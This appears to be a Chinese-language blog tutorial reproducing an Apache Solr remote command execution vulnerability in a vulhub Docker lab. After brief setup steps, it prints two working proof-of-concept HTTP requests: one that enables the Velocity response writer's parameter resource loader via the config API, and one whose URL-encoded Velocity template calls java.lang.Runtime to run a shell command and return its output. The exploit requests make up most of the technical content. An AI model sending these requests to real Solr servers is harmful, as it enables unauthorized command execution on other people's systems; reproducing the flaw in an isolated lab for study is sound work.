溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

發(fā)布時間:2021-11-11 16:55:05 來源:億速云 閱讀:199 作者:柒染 欄目:大數(shù)據(jù)

這篇文章給大家介紹Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn),內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

蹭個熱度,復(fù)現(xiàn)一波:Apache Solr遠(yuǎn)程命令執(zhí)行漏洞。

環(huán)境可以使用/vulhub/solr/CVE-2019-0193/的環(huán)境,進(jìn)入目錄后直接 docker-compose up -d 如下:

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

接著訪問對應(yīng)地址可以看到,搭建好的鏡像是沒有集合的,所以我們需要自行創(chuàng)建一個集合:


 

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

通過 docker exec -it 容器ID /bin/bash 進(jìn)入容器后執(zhí)行:./solr create -c solr_sample 創(chuàng)建集合如下:

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

可以從重新瀏覽器訪問一下solr admin,查看集合是否創(chuàng)建成功:

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

確認(rèn)成功后即可先通過bp向?qū)?yīng)路徑發(fā)送請求修改params.resource.loader.enabled配置為true,請求如下:

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

修改完配置以后通過poc即可執(zhí)行任意命令如圖:

Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)

相關(guān)poc如下:

//修改配置pocPOST /solr/集合名/config HTTP/1.1Host: 192.168.119.134:8983Content-Length: 259
{  "update-queryresponsewriter": {    "startup": "lazy",    "name": "velocity",    "class": "solr.VelocityResponseWriter",    "template.base.dir": "",    "solr.resource.loader.enabled": "true",    "params.resource.loader.enabled": "true"  }}
//遠(yuǎn)程代碼執(zhí)行pocGET /solr/solr_sample/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1Host: localhost:8983Host: 192.168.119.134:8983Content-Length: 0

關(guān)于Apache Solr遠(yuǎn)程命令如何進(jìn)行執(zhí)行復(fù)現(xiàn)就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI